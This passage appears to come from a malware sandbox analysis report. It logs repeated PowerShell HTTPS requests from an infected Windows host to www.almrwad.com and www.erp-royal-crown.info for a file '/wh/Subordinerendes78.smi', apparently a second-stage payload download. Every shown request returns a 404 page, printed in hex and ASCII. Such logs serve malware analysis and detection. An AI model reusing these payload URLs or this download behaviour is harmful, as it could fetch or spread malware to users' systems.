                                                    2024-12-05 09:44:13 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:44:13 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549751184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:18 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:18 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:44:18 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:44:18 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549762148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:24 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:24 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:24 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:44:24 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:44:24 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.549778184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:30 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:30 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:44:30 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:44:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.549794148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:36 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:36 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:36 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:44:36 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:44:36 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.549806184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:41 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:42 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:44:42 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:44:42 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.549822148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:47 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:48 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:48 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:44:48 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:44:48 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.549838184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:53 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:44:54 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:44:53 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:44:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.549849148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:44:59 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:00 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:44:59 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:45:00 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:45:00 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.549865184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:05 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:05 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:45:05 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:45:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.549881148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:11 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:11 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:45:11 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:45:11 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:45:11 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.549895184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:17 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:17 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:45:17 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:45:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.549908148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:23 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
